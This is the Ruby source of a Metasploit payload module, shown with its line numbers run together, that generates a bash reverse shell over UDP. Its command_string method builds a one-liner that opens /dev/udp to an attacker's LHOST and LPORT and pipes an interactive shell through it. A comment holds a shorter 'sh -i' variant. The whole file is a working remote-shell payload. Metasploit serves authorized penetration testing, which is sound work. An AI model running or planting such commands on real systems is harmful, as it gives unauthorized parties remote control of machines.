Path: blob/master/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = :dynamic78include Msf::Payload::Single9include Msf::Sessions::CommandShellOptions1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'Unix Command Shell, Reverse UDP (/dev/udp)',16'Description' => %q{17Creates an interactive shell via bash's builtin /dev/udp.1819This will not work on circa 2009 and older Debian-based Linux20distributions (including Ubuntu) because they compile bash21without the /dev/udp feature.22},23'Author' => [24'hdm', # Reverse bash TCP25'bcoles' # Reverse bash UDP26],27'License' => MSF_LICENSE,28'Platform' => 'unix',29'Arch' => ARCH_CMD,30'Handler' => Msf::Handler::ReverseUdp,31'Session' => Msf::Sessions::CommandShell,32'PayloadType' => 'cmd_bash',33'RequiredCmd' => 'bash-udp',34'Payload' => {35'Offsets' => {},36'Payload' => ''37}38)39)40register_advanced_options(41[42OptString.new('BashPath', [true, 'The path to the Bash executable', 'bash']),43OptString.new('ShellPath', [true, 'The path to the shell to execute', 'sh'])44]45)46end4748#49# Constructs the payload50#51def generate(_opts = {})52vprint_good(command_string)53return super + command_string54end5556#57# Returns the command string to use for execution58#59def command_string60fd = rand(20..219)61return "#{datastore['BashPath']} -c '0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};#{datastore['ShellPath']} <&#{fd} >&#{fd} 2>&#{fd}'"6263# no semicolons64# return "sh -i >& /dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1"65end66end676869